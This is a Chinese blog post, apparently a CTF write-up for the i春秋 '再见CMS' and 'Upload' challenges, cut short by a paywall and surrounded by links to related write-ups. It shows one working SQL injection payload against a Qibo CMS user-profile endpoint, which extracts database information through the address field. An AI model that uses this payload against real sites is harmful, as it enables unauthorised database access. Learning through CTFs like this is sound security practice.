i 春秋CTF题目百度杯 9月场再见CMS Upload 复现

最新推荐文章于 2024-04-13 02:17:52 发布

原创

最新推荐文章于 2024-04-13 02:17:52 发布 · 1.8k 阅读

标签

#百度 #安全 #web安全

收录于

本文分享了作者在CTF比赛中解决web安全问题的过程，包括利用注入漏洞复现、绕过文件上传过滤并利用load_file获取flag，展示了高级注入技巧和渗透测试思路。

今天花了点时间刷了下题目，遇到几道相对来说进阶的题目，学习一下储备一些CTF思路，这些题。。脑洞有点开。

再见CMS

昨天刚做一道

[WEB攻防] i春秋- “百度杯”CTF比赛十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入复现过程_AAAAAAAAAAAA66的博客-CSDN博客

今天继续按着套路来

直接在线CMS指纹识别

百度找到payload ，都是些过了很久的漏洞了

这里简单知道是一个注入漏洞就行了，我们的目的是照着payload修改找flag

POC

简单构造一下，
向http://localhost/qibov7/member/userinfo.php?job=edit&step=2
发送数据包：

truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,
address=(select user()) where uid=38%23

需要修改的emali=123@qq.com 和 uid=38

其中emali 是我们注册时用的邮箱

uid：点击我们个人主页，uid可以看到

下面到了自己动手的地方了(使用HACKBAR)

url

http://2ee06f

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

AAAAAAAAAAAA66

关注关注

0
点赞
踩
5

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

2022年网络安全技能大赛国赛 PE逆向分析

05-13

2022年全国职业院校技能大赛网络安全国赛 PE逆向分析 reverse

“百度杯”CTF比赛十一月场Look

wjd19980925的博客

04-13

515

“百度杯”CTF比赛十一月场Look

1 条评论您还未登录，请先登录后发表或查看评论

CTF —— 网络安全大赛（这不比王者好玩吗？）

Jinmindong

09-21

3014

CTF —— 网络安全大赛（这不比王者好玩吗？）

i春秋ctf练习

sparename的博客

04-24

5065

类型：Misc 题目名称：签到题类型：Misc 题目名称：所以这是13点吗类型：Misc 题目名称：嘀嘀嘀类型：Misc 题目名称：山岚类型：Misc 题目名称：签到题2 类型：Misc 题目名称：XX 类型：Misc 题目名称：贝丝家族类型：Misc 题目名称：敲击类型：Misc 题目名称：签到题3 类型：Misc 题目名称：小常识类型：Misc 题目名称：回归原始

i春秋-ctf 文件上传

AAAAAAAAAAAA66的博客

11-08

9966

文章目录前言一、题目二、解题步骤 1.我的错误思路 2.正确解题姿势总结前言 CTF小白，这道题思考了很久，i春秋上现在也没write up，卡了1天了，后面在buuctf找到了题解答。通过这一天让我对文件上传有了更深的理解。目录文章目录一、题目进入环境。二、解题步骤 1.我的错误思路 2.正确解题姿势总结一道普通的文件上传题，通过一天的思考我得到这类题目的思路总结。提示：以下是本篇文章正文内容，下

CTF--CMS漏洞总结

woshisz0413的博客

11-27

1万+

CMS漏洞总结 CMS类型题目：首先判断CMS类型，再查询该CMS曾经出现的漏洞，利用漏洞获取用户名(admin)、密码后进入管理员界面查找注入；或者上传一句话木马后使用菜刀连接，可能再连接数据库。 (1)CMSEASY类型可用公开漏洞网站：https://www.seebug.org/appdir/CmsEasy 1.cmseasy 无限制报错注入步骤：向http://*****/cel...

i春秋CTF web题(1)

weixin_30727835的博客

06-10

1442

之前边看writeup，边做实验吧的web题，多多少少有些收获。但是知识点都已记不清。所以这次借助i春秋这个平台边做题，就当记笔记一样写写writeup（其实都大部分还是借鉴其他人的writeup）。本人小白一枚，于是从低分题（简单题）边学边做这篇随笔会写4道题 0x01：爆破-1 0x02：爆破-2 0x03：爆破-3 0x04：upload 0x01：爆破-1 ...

CTF学习（二）

qq_52696970的博客

08-21

1129

CTF学习（二）Web站点信息收集1.CMS指纹识别2.针对CMS漏洞查询3.敏感目录信息4、wordpress测试端口信息收集1.端口介绍2.端口信息收集3.端口攻击4.防御措施 Web站点信息收集 1.CMS指纹识别 CMS（内容管理系统）：整站系统或文章系统。用于网站内容管理。用户只需要下载对应的CMS软件包，部署搭建，就可以直接利用CMS，简单方便。但是各种CMS都具有其独特的结构命名规则和特定的文件内容，因此可以利用这些内容来获取CMS站点的具体软件CMS与版本。常见CMS： dedecms（织

CTF是什么？一文带你读懂网络安全大赛

xx16755498979的博客

06-10

3412

现在的CTF比赛一般由专业队伍承担比赛平台、命题、赛事组织以及拥有自动化积分系统。参赛队伍需提交参赛申请，并且由DEF CON会议组织者们进行评选。比赛侧重于对计算机底层和系统安全的核心能力。

了解CTF。拿下CTF，什么是CTF夺旗赛？

HackKong的博客

01-09

1348

📚CTF（Capture The Flag），中文名`夺旗赛`。🆚网络安全人员之间进行竞技的一种比赛。” 技术本身是没有善恶的，问题的出现是因为人们滥用技术。我们学习黑客攻防、逆向破解等技术是为了更好的了解`计算机底层知识`，更好的应用到对人类有益的方面来。无论如何，绝不能`滥用技术`，`触犯道德和法律的底线`。如果你对CTF有兴趣，希望探索计算机的奥秘，了解本质原理，参与到网络安全建设中来，欢迎加入CTF大家庭。如果你也想学习:黑客&网络安全的SQL攻防。

CTF —— 网络安全大赛

Karka_的博客

06-17

2974

前言随着大数据、人工智能的发展，人们步入了新的时代，逐渐走上科技的巅峰。⚔科技是一把双刃剑，网络安全不容忽视，人们的隐私在大数据面前暴露无遗，账户被盗、资金损失、网络诈骗、隐私泄露，种种迹象表明，随着互联网的发展，网络安全需要引起人们的重视。互联网安全从其本质上来讲就是互联网上的信息安全。从广义来说，凡是涉及到互联网上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。‍ ‍ ‍ 网络安全需要一群网络安全技术人员的维护。而CTF，就是这些人技术竞技的比赛。

i春秋-网络与信息安全专项赛部分题目write up

宗泽的博客

08-16

1179

逆向 flat 进入IDA分析，找到主函数，F5查看伪代码里面存在好几个while循环和if判断，而且数值特别大。再往下看，下面还会输出“what a shame!!!”,意思是好可惜啊，可以判断，如果输出这句话，就说明我们错了，所以，通过上面的条件将这句话跳过去。可以看出来，当if（v4&1）成立时，v5会重新赋值，v16也会变，不满足下面的判断，执行“break”，从而跳过这...

i春秋首届全国数据安全大赛部分复盘

热门推荐

weixin_48421613的博客

10-27

2万+

2022年10月25日，为期两日的数据安全大赛于i春秋平台线上举行，在王队长的领队下，团队三个屁民开始了有趣的解题之旅。题目分为四个类型，分别是“安全知识”、“数据分析”、“数据算法”、以及数据安全。时间有点短，再加上有里还有活要干，所以很多题也没有答完，这次由我代表大家给大家进行一个复盘。

re学习笔记（101）i春秋全国大学生信息安全竞赛计时挑战

逆向随笔

06-18

1298

本文首发于 i春秋公众号巧用Frida与Unidbg快速在CTF中解题Frida是一个方便快捷的hook框架，在安卓逆向中是必不可少的hook工具。而对代码量不大的CTF安卓逆向题目来讲，使用Frida更是如鱼得水，调试程序、打印输出等都极为方便，就算有相应的检测，由于CTF中代码量并不是很大的情况，也可以快捷的定位、并对其进行hook绕过。而Unidbg可以对so层中的函数进行模拟执行，对于CTF题目来讲，往往无需太多的“补环境”，Unidbg就能将指定的函数模拟执行起来并获得结果。在本文中笔者将以全国

百度杯”CTF比赛（十二月场)

Root__Liu的博客

04-13

4328

"百度杯"CTF比赛（十二月场）第一场 1、传说中的签到题解决：把二进制用在线进制转换器转换，发现转为10进制时，和tips2一样，在qq上一查，是CTF官方群，在公告里有一个字符串ZmxhZ3tiMTU5MDI4Yy05NWZmLTRmNzEtYWQ3Yi1jZWY1MTBhMjJkMDB9 用base64解码，得到flag， flag{b159028c-95ff-4f

百度杯全国网络攻防大赛——初来乍到

sec_lee的专栏

03-12

6664

百度杯全国网络攻防大赛初赛采用的是国际通用的CTF模式，即capture the flag（夺旗大赛）。每队5-15人，在一定时间（一般48小时）内解决：MISC、PPC & CRYPTO、PWN、REVERSE四个安全方面的问题，问题的答案以“BCTF{flag}”的形式隐藏在某个地方，发现该模式的字符串以后，在竞赛网站提交flag就可以，注意flag是大小写敏感的。第一题：

“百度杯”CTF比赛九月场——Web-Upload

大方子

08-06

1693

============================= 个人收获： 1.PHP标记的不同写法 2.PHP标记被过滤可以试试大小写 ============================== 不知道为什么写这篇文章的时候CSDN的服务器出现问题一直无法上传图片，索性就不传了，因为这题挺简单的。题目开始是说让我们随便上传文件，那么我们找个一句话直接上传 &lt...

CTF —— 网络安全大赛_ctf网络安全大赛，2024年最新高级网络安全面试答案

2401_83974370的博客

04-13

988

随着大数据、人工智能的发展，人们步入了新的时代，逐渐走上科技的巅峰。⚔科技是一把双刃剑，网络安全不容忽视，人们的隐私在大数据面前暴露无遗，账户被盗、资金损失、网络诈骗、隐私泄露，种种迹象表明，随着互联网的发展，网络安全需要引起人们的重视。互联网安全从其本质上来讲就是互联网上的信息安全。从广义来说，凡是涉及到互联网上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。‍ ‍ ‍ 网络安全需要一群网络安全技术人员的维护。而CTF，就是这些人技术竞技的比赛。

23、Web攻防——Python考点&CTF与CMS-SSTI模板注入&PYC反编译

qq_55202378的博客

12-20

671

模板引擎：模板引擎（这里特指用于Web开发的模板引擎）是为了使用户界面与业务数据（内容）分离而产生的，它可以生成特定格式的文档，利用模板引擎来生成前端的html代码，模板引擎会提供一套生成html代码的程序，然后只需要获取用户的数据，然后放到渲染函数里，然后生成模板+用户数据的前端html页面，然后反馈给浏览器，呈现在用户面前。如果报错页面的url或者post数据中，有一个参数你是可以控制，且会显示在报错页面中，那么就有可能存在SSTI模板注入。文件，一般python文件改变后，都会重新生成pyc文件。

【CTF大赛】2021 DASCTF July cybercms 一探再探

A_991128a的博客

01-05

731

预期解是从后台登录处进行 SQL 注入写入一句话木马，然而咱在做题的时候尝试了另一种思路，用的是后台登录绕过 & 木马上传的打法。由于比赛的时候半天打不通就十分难受，赛后还是想不明白就来稍微深入探究了一下，经过曲折最后终于成功打通了。然而还是没打通，报错和上面的类似，也是 PHP 执行的时候文件目录没权限，只不过可以注意到文件名是。害，赛后看了看大佬的 wp，么得办法，还是得走 SQL 注入写入文件呗。都是可控的，任意改一个就完事了。过滤去掉了，另外把一些关键词过滤为空了，双写绕过就完事了。

i 春秋CTF题目 百度杯 9月场 再见CMS Upload 复现

再见CMS

i 春秋CTF题目百度杯 9月场再见CMS Upload 复现